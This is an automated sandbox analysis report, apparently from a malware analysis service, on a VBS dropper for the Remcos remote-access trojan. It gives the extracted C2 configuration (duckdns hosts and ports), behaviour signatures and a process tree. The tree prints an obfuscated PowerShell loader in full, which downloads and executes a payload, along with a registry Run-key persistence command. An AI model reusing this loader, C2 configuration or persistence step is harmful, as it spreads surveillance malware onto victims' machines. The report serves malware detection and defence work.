Overview

overview

10

Static

static

1

e4c5f96a9f...5b.vbs

windows7-x64

8

e4c5f96a9f...5b.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    155s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22/10/2024, 01:57

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    e4c5f96a9fbb32b0754fba2c4bd4a3773a77d8018b7aa5d572b067777de7165b.vbs

  • Size

    26KB

  • MD5

    1c78cc71bf8db131a33f156feff9ec4d

  • SHA1

    af06e517411ac017868488d8a7173bb2d5d98012

  • SHA256

    e4c5f96a9fbb32b0754fba2c4bd4a3773a77d8018b7aa5d572b067777de7165b

  • SHA512

    868f20c758607c5e98310a437eb621246928564936ab6fb311f825ec0554b1181eacbddd9335b897fe85e488fc2feba69009a5f5c5539a76f605c22ae5948a32

  • SSDEEP

    384:XrCiX5aUO2sEZovx4IhH4iwTrUtngui1/92lP8oyrZsqfQAU:Xe+pvyl4vT4o3/rm

Score
10/10
remcosremdiscoveryexecutionpersistencerat

Malware Config

Extracted

Family

remcos

Botnet

Rem

C2

blackass.duckdns.org:65253

blackass.duckdns.org:53241
Attributes
  • audio_folder

    MicRecords

  • audio_path

    ApplicationPath

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-K8KWVT

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

    ratremcos
  • Blocklisted process makes network request 64 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

    execution
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 14 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e4c5f96a9fbb32b0754fba2c4bd4a3773a77d8018b7aa5d572b067777de7165b.vbs"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1200
    • C:\Windows\System32\ping.exe
      ping gormezl_6777.6777.6777.677e
      2⤵
      • System Network Configuration Discovery: Internet Connection Discovery
      • Runs ping.exe
      PID:2384
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Semipoor Radiculose Hornuglen Laminaterne Cadesse Freespac #>;$Henkastet='Splenetically35';<#Kaskoforsikre Bollix Rdslens #>;$Stepway=$Sammentrdninger+$host.UI; function Tuggery($cracks){If ($Stepway) {$Rupturable++;}$Seerlike=$Ordrebeholdningernes+$cracks.'Length'-$Rupturable; for( $Pickaxes=4;$Pickaxes -lt $Seerlike;$Pickaxes+=5){$Undertrkkene=$Pickaxes;$Fascinationen+=$cracks[$Pickaxes];$Bronchoesophagoscopy='Noomis';}$Fascinationen;}function Phonogramically($Karaktermord){ . ($fritflue) ($Karaktermord);}$Finalismens=Tuggery 'SurmMPo aoUnsezAllei,syklTra.l Proa Rep/Spar ';$Finalismens+=Tuggery 'N ct5S ng. Kar0Deut Ne (DeliWYdmyipaponbombdBoreoRegnwstansK tt AcouNValvTTabl Lept1Rere0Fami.M al0 ps;Unsc Ha,nWaeroiLyrinRefl6Star4sca ;Clip chylxFutu6Li h4tax ; Blr DefarCryov Q,i:Tinc1Re.i3 Kod1Stop.Term0 .eo)Sp.j FabuGTraneS.ltcDentk rinoB ne/Unde2Si n0Konk1Kabi0Hu.d0Umbr1 Agn0Note1Guri SndFautoiSa,drAnteeCob fLuckoPa,ax van/ gtp1Per.3Sini1Salm.Sta 0L.ks ';$brokbinds=Tuggery 'stafu.ankSMongE HabR unm-ste aH lkg T,oeBedrNF.lutBedr ';$Hematozoan=Tuggery 'noeshBagetKoortRefepUransDisk:clei/Krak/ Sliw RenwA,etwTekn. AntgTnksr Sluo DecuSublpVi.erOveri,apoaProgm Hou.WithcClaso jemRa,e/SminMF.vraEr,vnNiddd DrisBipecMandhByzaaPre uArnuvVicaiEr.vnIn qiFraasRavemSysseDefl. DissHemanLovlp rug> RenhBuk tCheftRej.pSands emi:Verr/Sple/OejnbOrrorKaktuSub t Sa aUdsd.Ahorp.lurl Sy /Sor MHkkeaAfg n etrdMi lsDivucheelhDisca Tu uShawvAfstinon nSpkkiForvsFo mm.lageSkru.Ca bs RevnBesppAnel ';$dacha=Tuggery ' Shi>Blue ';$fritflue=Tuggery 'Resai PineRagsX ugg ';$Dessinatren='solstraalehistoriers';$Sygne='\Sttefiskenes.Tav';Phonogramically (Tuggery 'Prod$ BolGSydkL.umaOTratbbetaa SpolBis.: elldTezcIPrsiSA.beKStanS Absp Proe HanCCystiHa,tF ngmiTunnKNonpA alot laiIAmbiolaboNLeukeboflrKontS Syn2 Kla4Exci8Ceph=chit$Ungde L sN ftev Non:ewerAR vapSupepAdu.DSataAB ugtbefaatuft+G.da$CplbSAutoYFritG waiNAdfrEBg r ');Phonogramically (Tuggery 'br d$UratGRelalHerbo U,hb YikaTo,mL H.k:CanaBOpsirSkibUSlukgMonoeEsquRFires ixeSaffRCa sV ConIApatc BudERist=Komm$be yhMurdEBeweMEurhaPigrtUnciobadezSmalOForuADoorNMeal. De,s En PExodl.eenIHemiTHyal( agt$GangDPaniaschlC SatHSjusafunk)t,im ');Phonogramically (Tuggery 'thro[FlerNHeptECasttCaes. Pe SK mmECardRStamVTilbiHaanCLns eAdipPDr.goDramiChronKbslt .limVar.A acknBe oaAdelgHed.eSatcR nde]Enke:Ring: Pr s Kone U gCLae,U SneRKariI TreTVejrysup p TrarUimoo SaltKltroAfsvCGlucoEpenLFjel Tris=beha P ke[RunoNSweeETab.tV.nd.AmbasIndkeEva C Mi.UDestRBeslIEuphtTe,ly VirpRaadrE erO.ascTBr.rOHyg C Diao.epaLF,sttGoniYHestP v eEJobb]Si.d:Dkna:D taTJa.bL,ukksSe i1Dich2Olip ');$Hematozoan=$Brugerservice[0];$Discriminatingness=(Tuggery ' asd$ ntegLu tL eclOAntibS,rhAFabrLF lk:Retsg FolrRygeUUdreN ChaDMil.LBlemNSk,fS Pho=CoutNIndieAporwUros-CaseO rthbHannjReg eAst,C T it ggr PresVid.YsoliS ult BliECombm Ste.MandnTh.rEst.lTSali. onowB ufeGelaBMorbCT,anlmod I H feBossnSwe.tAvec ');Phonogramically ($Discriminatingness);Phonogramically (Tuggery ' nob$RattGPal rCapru dgnSubndBefjlMascn SjlsDi,e.afb,H,apseTilpa Unid,mageSforrGonosnach[ luo$Ch.cbM norSt,no WagkFirebPiloiIndhnExcedTampsTeat]Ato = Pas$RaceF Ry iTvedn udbaSi.ilA,oniCoexs Ve m emieTilrn ScusGumw ');$Fredric=Tuggery ' Mol$ PopG AutrU ysuSeycnFor d ElwlYppenLi rsGarv. DopDTrouo GrewAurin SoflH ltoTricanonsdS ntFStreiMul,lIngee ef(tonj$TinnHMarke ellmStataBiogtObstoFirmzTempoUnstaElemnKrae, ak,$TubuSPolie iffl Kalv FlosG ankRehey atelAnthd infnDelme IndrShorkToupafrimuGamatKon ivedto AshnHelleMidtr F lnAlame.jrgs G n)P,eu ';$Selvskyldnerkautionernes=$Diskspecifikationers248;Phonogramically (Tuggery ' Eng$MenuGCardl horOOverB TriAStamlKonn: teu torn L,nGChokkGlutaReserAds,LFje,E.vinLT leE OrdJSkylL usIHypeG oyeH AdeE minDA,onECo lN Da =Card(T net AmiERabiSSekutPse,-EksppUnalaSenntOverHAlbu Agen$ potsLierEStudL,uldv rilSVerekDentYLab,L Besd,ilinHulleskraRautokUnp AMachUP toTReuniOlymO Fr nGregEAc,yRStraNe teePan.S P,e)Synk ');while (!$Ungkarlelejligheden) {Phonogramically (Tuggery 'Trn $Cathg DatlgradoRuinb MotaGranl Str: onrFEmeriBenelHkliiTabtcMergian rf kaeoAborrFronm.pil2Skil2Ste.6Pant=Disg$StortpicarFiskuBrigeUlve ') ;Phonogramically $Fredric;Phonogramically (Tuggery 'Brt sSupeTStomaTrutr coaTSlid- GurSTyrol MulE Ti E BehPEksa Rab4Bedr ');Phonogramically (Tuggery 'Opbl$ UddG FusL Malo EncbF siA.ulgL M,n:S.aluNonsN Tm,g Cirk iffaVikirSnerL AtoeSky LFacteKohsJDe tLLderiAmelg FifHNonaEJuibd UtiE BosNStra=Tele(PaviTFoxhE alsSluttDa,g-StedP W oaMacmTSid h ri J rg$Spr s ammE F llAcriVB.igsSekrKUnpeY ElilPos D TypNKaleeP ycrArboKSl,mAF,rvUGhast Su IK geOUd.inRendESimorUbruN Pr.EphosS Lik)Mobn ') ;Phonogramically (Tuggery ' eng$DybdgIncul LanoUlovBMadoATa aLK nt:RingISpydnSalgd ramsN,ury HanLSubtTUranEStu.D alveVolu=Vers$AagegSociLSkaroImpaBPligaS.ydlSkib:BeliU banTr uD.andeBrokr ,onDStraiFe,lDKurs+Sacc+ad e%anfg$MenuBSkibRafleu SkrGRig eSa,srOutcSIagtE MezrMeteVSc oIRenpC egnERuss. ThecInstOArb Uaustn BasTapol ') ;$Hematozoan=$Brugerservice[$Indsyltede];}$Banquette=344282;$Gynobasic=30458;Phonogramically (Tuggery 'he e$ Sl G LdiLAlbuoGadiBIgnoA lyklSkld: RefQStudUMithiExtrNF rkIOpprrNon eHysttUf ri artnAph. mag = ami AmbiGMuspEUn aT.hor- modcLavtO eonNanstAngaeCowsnForttTint ich$Glats fsteKariLfri v pprSUn,ok SkoyTlinLmu.dDMe lnGausePolyrHemokShilAFamiUSoc t De,iM.cro msNBl dE Firr OutN alleSu,tsScul ');Phonogramically (Tuggery 'Kvar$EntegCeralStreoMesobGangaSemilPeng:AnsoSDuotkGs iiKlaslInspt P reglersM sekB.dwrKildiForhfMe itOvereOvernSkl Jagg=Styr Scop[BrneSUdviyR mbsArtitForueZ ppmEhle.A noC Cl,oKo pnCutwvBeboeLophr upt cro]Bell:Buks:PervFTh,orGrooo andm etrBNonpa .unsf,bre,fta6 Hus4HektSPreftNonerEftei Fugn,arlg Mik(Cha $femtQout uOveriE osnHapli Ferr onoeMiljtMe oiOpernMyco).icr ');Phonogramically (Tuggery 'Busk$FladgjasmlAv so D nB BroaPreclGa,e:PersCK naY .iscPol l aneIPurpz He EOverSUnse Upg= rak Bags[OutlsUngly LsrsReprTJam e o tMInt,.sygeTDecre Sn XBlodtS bt.overE CivnNeurcForvOSickd ,oniEvapNRejsgCypt]Nymp:Deva: TroA Clissta,CDemoI BaciBor,.SnudGOrdae RektraadsunhaT DoxrEfteIOms NMakag Sug(Anon$S spsPsykKensoiMutilForhtSolaeUrinS NonKStoprSk ai ,akFChiltObseeUnexnIdrt),ons ');Phonogramically (Tuggery ' No.$SnydgAnchLHarao AlyBOrdrA Facl Syg:KintsEss.lAnnogMealtNatus ernfT agEHamaj rakDRe.rENedvnFrui1Udsk1 Ca 4 nde=Kugl$ConsC cheyRes CMultLSl gIIntezSko,EPhorSMave.CarisInjuU.ranBGangSFa atMe aRTranI esonG,niG Op,(U fr$ .albThoraSprnNDefeQ Hn UAtone ott SmaTKl vESafi,kuri$BarigSortYYa,gnLowloAvisbMonoASammsO erIOverc lok)Fors ');Phonogramically $Slgtsfejden114;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:868
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Semipoor Radiculose Hornuglen Laminaterne Cadesse Freespac #>;$Henkastet='Splenetically35';<#Kaskoforsikre Bollix Rdslens #>;$Stepway=$Sammentrdninger+$host.UI; function Tuggery($cracks){If ($Stepway) {$Rupturable++;}$Seerlike=$Ordrebeholdningernes+$cracks.'Length'-$Rupturable; for( $Pickaxes=4;$Pickaxes -lt $Seerlike;$Pickaxes+=5){$Undertrkkene=$Pickaxes;$Fascinationen+=$cracks[$Pickaxes];$Bronchoesophagoscopy='Noomis';}$Fascinationen;}function Phonogramically($Karaktermord){ . ($fritflue) ($Karaktermord);}$Finalismens=Tuggery 'SurmMPo aoUnsezAllei,syklTra.l Proa Rep/Spar ';$Finalismens+=Tuggery 'N ct5S ng. Kar0Deut Ne (DeliWYdmyipaponbombdBoreoRegnwstansK tt AcouNValvTTabl Lept1Rere0Fami.M al0 ps;Unsc Ha,nWaeroiLyrinRefl6Star4sca ;Clip chylxFutu6Li h4tax ; Blr DefarCryov Q,i:Tinc1Re.i3 Kod1Stop.Term0 .eo)Sp.j FabuGTraneS.ltcDentk rinoB ne/Unde2Si n0Konk1Kabi0Hu.d0Umbr1 Agn0Note1Guri SndFautoiSa,drAnteeCob fLuckoPa,ax van/ gtp1Per.3Sini1Salm.Sta 0L.ks ';$brokbinds=Tuggery 'stafu.ankSMongE HabR unm-ste aH lkg T,oeBedrNF.lutBedr ';$Hematozoan=Tuggery 'noeshBagetKoortRefepUransDisk:clei/Krak/ Sliw RenwA,etwTekn. AntgTnksr Sluo DecuSublpVi.erOveri,apoaProgm Hou.WithcClaso jemRa,e/SminMF.vraEr,vnNiddd DrisBipecMandhByzaaPre uArnuvVicaiEr.vnIn qiFraasRavemSysseDefl. DissHemanLovlp rug> RenhBuk tCheftRej.pSands emi:Verr/Sple/OejnbOrrorKaktuSub t Sa aUdsd.Ahorp.lurl Sy /Sor MHkkeaAfg n etrdMi lsDivucheelhDisca Tu uShawvAfstinon nSpkkiForvsFo mm.lageSkru.Ca bs RevnBesppAnel ';$dacha=Tuggery ' Shi>Blue ';$fritflue=Tuggery 'Resai PineRagsX ugg ';$Dessinatren='solstraalehistoriers';$Sygne='\Sttefiskenes.Tav';Phonogramically (Tuggery 'Prod$ BolGSydkL.umaOTratbbetaa SpolBis.: elldTezcIPrsiSA.beKStanS Absp Proe HanCCystiHa,tF ngmiTunnKNonpA alot laiIAmbiolaboNLeukeboflrKontS Syn2 Kla4Exci8Ceph=chit$Ungde L sN ftev Non:ewerAR vapSupepAdu.DSataAB ugtbefaatuft+G.da$CplbSAutoYFritG waiNAdfrEBg r ');Phonogramically (Tuggery 'br d$UratGRelalHerbo U,hb YikaTo,mL H.k:CanaBOpsirSkibUSlukgMonoeEsquRFires ixeSaffRCa sV ConIApatc BudERist=Komm$be yhMurdEBeweMEurhaPigrtUnciobadezSmalOForuADoorNMeal. De,s En PExodl.eenIHemiTHyal( agt$GangDPaniaschlC SatHSjusafunk)t,im ');Phonogramically (Tuggery 'thro[FlerNHeptECasttCaes. Pe SK mmECardRStamVTilbiHaanCLns eAdipPDr.goDramiChronKbslt .limVar.A acknBe oaAdelgHed.eSatcR nde]Enke:Ring: Pr s Kone U gCLae,U SneRKariI TreTVejrysup p TrarUimoo SaltKltroAfsvCGlucoEpenLFjel Tris=beha P ke[RunoNSweeETab.tV.nd.AmbasIndkeEva C Mi.UDestRBeslIEuphtTe,ly VirpRaadrE erO.ascTBr.rOHyg C Diao.epaLF,sttGoniYHestP v eEJobb]Si.d:Dkna:D taTJa.bL,ukksSe i1Dich2Olip ');$Hematozoan=$Brugerservice[0];$Discriminatingness=(Tuggery ' asd$ ntegLu tL eclOAntibS,rhAFabrLF lk:Retsg FolrRygeUUdreN ChaDMil.LBlemNSk,fS Pho=CoutNIndieAporwUros-CaseO rthbHannjReg eAst,C T it ggr PresVid.YsoliS ult BliECombm Ste.MandnTh.rEst.lTSali. onowB ufeGelaBMorbCT,anlmod I H feBossnSwe.tAvec ');Phonogramically ($Discriminatingness);Phonogramically (Tuggery ' nob$RattGPal rCapru dgnSubndBefjlMascn SjlsDi,e.afb,H,apseTilpa Unid,mageSforrGonosnach[ luo$Ch.cbM norSt,no WagkFirebPiloiIndhnExcedTampsTeat]Ato = Pas$RaceF Ry iTvedn udbaSi.ilA,oniCoexs Ve m emieTilrn ScusGumw ');$Fredric=Tuggery ' Mol$ PopG AutrU ysuSeycnFor d ElwlYppenLi rsGarv. DopDTrouo GrewAurin SoflH ltoTricanonsdS ntFStreiMul,lIngee ef(tonj$TinnHMarke ellmStataBiogtObstoFirmzTempoUnstaElemnKrae, ak,$TubuSPolie iffl Kalv FlosG ankRehey atelAnthd infnDelme IndrShorkToupafrimuGamatKon ivedto AshnHelleMidtr F lnAlame.jrgs G n)P,eu ';$Selvskyldnerkautionernes=$Diskspecifikationers248;Phonogramically (Tuggery ' Eng$MenuGCardl horOOverB TriAStamlKonn: teu torn L,nGChokkGlutaReserAds,LFje,E.vinLT leE OrdJSkylL usIHypeG oyeH AdeE minDA,onECo lN Da =Card(T net AmiERabiSSekutPse,-EksppUnalaSenntOverHAlbu Agen$ potsLierEStudL,uldv rilSVerekDentYLab,L Besd,ilinHulleskraRautokUnp AMachUP toTReuniOlymO Fr nGregEAc,yRStraNe teePan.S P,e)Synk ');while (!$Ungkarlelejligheden) {Phonogramically (Tuggery 'Trn $Cathg DatlgradoRuinb MotaGranl Str: onrFEmeriBenelHkliiTabtcMergian rf kaeoAborrFronm.pil2Skil2Ste.6Pant=Disg$StortpicarFiskuBrigeUlve ') ;Phonogramically $Fredric;Phonogramically (Tuggery 'Brt sSupeTStomaTrutr coaTSlid- GurSTyrol MulE Ti E BehPEksa Rab4Bedr ');Phonogramically (Tuggery 'Opbl$ UddG FusL Malo EncbF siA.ulgL M,n:S.aluNonsN Tm,g Cirk iffaVikirSnerL AtoeSky LFacteKohsJDe tLLderiAmelg FifHNonaEJuibd UtiE BosNStra=Tele(PaviTFoxhE alsSluttDa,g-StedP W oaMacmTSid h ri J rg$Spr s ammE F llAcriVB.igsSekrKUnpeY ElilPos D TypNKaleeP ycrArboKSl,mAF,rvUGhast Su IK geOUd.inRendESimorUbruN Pr.EphosS Lik)Mobn ') ;Phonogramically (Tuggery ' eng$DybdgIncul LanoUlovBMadoATa aLK nt:RingISpydnSalgd ramsN,ury HanLSubtTUranEStu.D alveVolu=Vers$AagegSociLSkaroImpaBPligaS.ydlSkib:BeliU banTr uD.andeBrokr ,onDStraiFe,lDKurs+Sacc+ad e%anfg$MenuBSkibRafleu SkrGRig eSa,srOutcSIagtE MezrMeteVSc oIRenpC egnERuss. ThecInstOArb Uaustn BasTapol ') ;$Hematozoan=$Brugerservice[$Indsyltede];}$Banquette=344282;$Gynobasic=30458;Phonogramically (Tuggery 'he e$ Sl G LdiLAlbuoGadiBIgnoA lyklSkld: RefQStudUMithiExtrNF rkIOpprrNon eHysttUf ri artnAph. mag = ami AmbiGMuspEUn aT.hor- modcLavtO eonNanstAngaeCowsnForttTint ich$Glats fsteKariLfri v pprSUn,ok SkoyTlinLmu.dDMe lnGausePolyrHemokShilAFamiUSoc t De,iM.cro msNBl dE Firr OutN alleSu,tsScul ');Phonogramically (Tuggery 'Kvar$EntegCeralStreoMesobGangaSemilPeng:AnsoSDuotkGs iiKlaslInspt P reglersM sekB.dwrKildiForhfMe itOvereOvernSkl Jagg=Styr Scop[BrneSUdviyR mbsArtitForueZ ppmEhle.A noC Cl,oKo pnCutwvBeboeLophr upt cro]Bell:Buks:PervFTh,orGrooo andm etrBNonpa .unsf,bre,fta6 Hus4HektSPreftNonerEftei Fugn,arlg Mik(Cha $femtQout uOveriE osnHapli Ferr onoeMiljtMe oiOpernMyco).icr ');Phonogramically (Tuggery 'Busk$FladgjasmlAv so D nB BroaPreclGa,e:PersCK naY .iscPol l aneIPurpz He EOverSUnse Upg= rak Bags[OutlsUngly LsrsReprTJam e o tMInt,.sygeTDecre Sn XBlodtS bt.overE CivnNeurcForvOSickd ,oniEvapNRejsgCypt]Nymp:Deva: TroA Clissta,CDemoI BaciBor,.SnudGOrdae RektraadsunhaT DoxrEfteIOms NMakag Sug(Anon$S spsPsykKensoiMutilForhtSolaeUrinS NonKStoprSk ai ,akFChiltObseeUnexnIdrt),ons ');Phonogramically (Tuggery ' No.$SnydgAnchLHarao AlyBOrdrA Facl Syg:KintsEss.lAnnogMealtNatus ernfT agEHamaj rakDRe.rENedvnFrui1Udsk1 Ca 4 nde=Kugl$ConsC cheyRes CMultLSl gIIntezSko,EPhorSMave.CarisInjuU.ranBGangSFa atMe aRTranI esonG,niG Op,(U fr$ .albThoraSprnNDefeQ Hn UAtone ott SmaTKl vESafi,kuri$BarigSortYYa,gnLowloAvisbMonoASammsO erIOverc lok)Fors ');Phonogramically $Slgtsfejden114;"
    1⤵
    • Command and Scripting Interpreter: PowerShell
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4144
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\SysWOW64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1736
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Griddles% -windowstyle 1 $Coagula=(gp -Path 'HKCU:\Software\Meddling\').Udmundingers;%Griddles% ($Coagula)"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2440
        • C:\Windows\SysWOW64\reg.exe
          REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Griddles% -windowstyle 1 $Coagula=(gp -Path 'HKCU:\Software\Meddling\').Udmundingers;%Griddles% ($Coagula)"
          4⤵
          • Adds Run key to start application
          • System Location Discovery: System Language Discovery
          • Modifies registry key
          PID:3188

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    806286a9ea8981d782ba5872780e6a4c

    SHA1

    99fe6f0c1098145a7b60fda68af7e10880f145da

    SHA256

    cd2c977928e78b2d39bba8a726308f17b2946ea3f1a432de209720f691450713

    SHA512

    362df97f9fc9c2f546538814cd0402a364a286326219f03325f8cbd59d33f9d850c26daf42230f0bb4feb7e5134868a51e7a3d2f5bc136fe3de69d5d82c5ae2e

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_501qgonr.vaz.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Sttefiskenes.Tav
    Filesize

    487KB

    MD5

    9c5b82736c863dd8d126471d00eb7a3e

    SHA1

    3c2d70d4ae1eb5578213ef898aaa09d5528793db

    SHA256

    d912a2830162abca8c41f77a05b3a62e843fc359808f0091fcc4252ef10da6db

    SHA512

    e5dd3dc4e2188f54eb12c73630bd9c756d803a07f5915233fca0402d910cbcb31bd85a69174d482f3550213323ca6def3c7edf8455f700c020bb696e4ce0823c

    Download Submit

  • memory/868-5-0x0000027ACD570000-0x0000027ACD592000-memory.dmp

    Filesize

    136KB

    Download

  • memory/868-15-0x00007FF908AC0000-0x00007FF909581000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/868-16-0x00007FF908AC0000-0x00007FF909581000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/868-19-0x00007FF908AC0000-0x00007FF909581000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/868-22-0x00007FF908AC0000-0x00007FF909581000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/868-4-0x00007FF908AC3000-0x00007FF908AC5000-memory.dmp

    Filesize

    8KB

    Download

  • memory/1736-64-0x0000000000E00000-0x0000000002054000-memory.dmp

    Filesize

    18.3MB

    Download

  • memory/1736-65-0x0000000000E00000-0x0000000002054000-memory.dmp

    Filesize

    18.3MB

    Download

  • memory/1736-63-0x0000000000E00000-0x0000000002054000-memory.dmp

    Filesize

    18.3MB

    Download

  • memory/1736-62-0x0000000000E00000-0x0000000002054000-memory.dmp

    Filesize

    18.3MB

    Download

  • memory/1736-66-0x0000000000E00000-0x0000000002054000-memory.dmp

    Filesize

    18.3MB

    Download

  • memory/1736-61-0x0000000000E00000-0x0000000002054000-memory.dmp

    Filesize

    18.3MB

    Download

  • memory/1736-60-0x0000000000E00000-0x0000000002054000-memory.dmp

    Filesize

    18.3MB

    Download

  • memory/1736-59-0x0000000000E00000-0x0000000002054000-memory.dmp

    Filesize

    18.3MB

    Download

  • memory/1736-58-0x0000000000E00000-0x0000000002054000-memory.dmp

    Filesize

    18.3MB

    Download

  • memory/1736-57-0x0000000000E00000-0x0000000002054000-memory.dmp

    Filesize

    18.3MB

    Download

  • memory/1736-56-0x0000000000E00000-0x0000000002054000-memory.dmp

    Filesize

    18.3MB

    Download

  • memory/1736-53-0x0000000000E00000-0x0000000002054000-memory.dmp

    Filesize

    18.3MB

    Download

  • memory/4144-24-0x0000000005120000-0x0000000005748000-memory.dmp

    Filesize

    6.2MB

    Download

  • memory/4144-47-0x0000000008870000-0x000000000E2A2000-memory.dmp

    Filesize

    90.2MB

    Download

  • memory/4144-45-0x00000000082C0000-0x0000000008864000-memory.dmp

    Filesize

    5.6MB

    Download

  • memory/4144-43-0x00000000070B0000-0x0000000007146000-memory.dmp

    Filesize

    600KB

    Download

  • memory/4144-44-0x0000000007040000-0x0000000007062000-memory.dmp

    Filesize

    136KB

    Download

  • memory/4144-41-0x0000000007690000-0x0000000007D0A000-memory.dmp

    Filesize

    6.5MB

    Download

  • memory/4144-42-0x00000000063B0000-0x00000000063CA000-memory.dmp

    Filesize

    104KB

    Download

  • memory/4144-40-0x0000000005E70000-0x0000000005EBC000-memory.dmp

    Filesize

    304KB

    Download

  • memory/4144-39-0x0000000005E40000-0x0000000005E5E000-memory.dmp

    Filesize

    120KB

    Download

  • memory/4144-33-0x00000000057C0000-0x0000000005B14000-memory.dmp

    Filesize

    3.3MB

    Download

  • memory/4144-27-0x0000000005750000-0x00000000057B6000-memory.dmp

    Filesize

    408KB

    Download

  • memory/4144-26-0x0000000005000000-0x0000000005066000-memory.dmp

    Filesize

    408KB

    Download

  • memory/4144-25-0x0000000004E60000-0x0000000004E82000-memory.dmp

    Filesize

    136KB

    Download

  • memory/4144-23-0x0000000002500000-0x0000000002536000-memory.dmp

    Filesize

    216KB

    Download